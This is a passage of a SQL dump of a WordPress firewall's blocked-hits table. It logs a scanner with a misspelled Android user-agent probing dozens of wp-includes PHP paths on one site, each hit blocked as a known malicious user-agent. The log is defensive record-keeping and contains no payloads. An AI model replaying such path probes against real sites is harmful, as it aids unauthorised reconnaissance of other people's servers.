AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1ldGEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133914,1699931886.997368,1699931886.988600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-active-formatting-elements.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtYWN0aXZlLWZvcm1hdHRpbmctZWxlbWVudHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133915,1699931883.214645,1699931883.192400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133954,1699932258.645503,1699932258.630700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWJsb2Nrcy1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133916,1699931871.454705,1699931871.445900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/global-styles-and-settings.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2dsb2JhbC1zdHlsZXMtYW5kLXNldHRpbmdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133917,1699931866.901675,1699931866.880000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133918,1699931855.893524,1699931855.884600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face-resolver.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS1yZXNvbHZlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133953,1699932265.205400,1699932265.196600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWNvbW1lbnRzLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133919,1699931848.180470,1699931848.158700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133920,1699931834.367988,1699931834.359200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133921,1699931830.601672,1699931830.587000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-widget-form-customize-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC13aWRnZXQtZm9ybS1jdXN0b21pemUtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134029,1699932901.182987,1699932901.168900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1lZGlhLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133952,1699932268.301612,1699932268.292800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133922,1699931825.270431,1699931825.261000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-widget-area-customize-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC13aWRnZXQtYXJlYS1jdXN0b21pemUtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133923,1699931819.138237,1699931819.128600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-sidebar-block-editor-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1zaWRlYmFyLWJsb2NrLWVkaXRvci1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}');
INSERT INTO `wpcl_wfhits` VALUES (133924,1699931812.871946,1699931812.863100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-upload-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtdXBsb2FkLWNvbnRyb2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133951,1699932272.031406,1699932272.022600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-edit-site-export-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWVkaXQtc2l0ZS1leHBvcnQtY29udHJvbGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133925,1699931808.217482,1699931808.195700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-themes-section.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtdGhlbWVzLXNlY3Rpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133926,1699931800.082590,1699931800.073800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-themes-panel.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtdGhlbWVzLXBhbmVsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133927,1699931793.512101,1699931793.503400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-theme-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtdGhlbWUtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133950,1699932279.104395,1699932279.093400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-global-styles-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWdsb2JhbC1zdHlsZXMtY29udHJvbGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133928,1699931789.143038,1699931789.134200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-site-icon-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtc2l0ZS1pY29uLWNvbnRyb2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134030,1699932892.616020,1699932892.607300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-video.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1lZGlhLXZpZGVvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133929,1699931784.964042,1699931784.950500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-sidebar-section.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtc2lkZWJhci1zZWN0aW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133930,1699931780.203233,1699931780.194500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-selective-refresh.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtc2VsZWN0aXZlLXJlZnJlc2gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133949,1699932283.836522,1699932283.827700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-global-styles-revisions-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 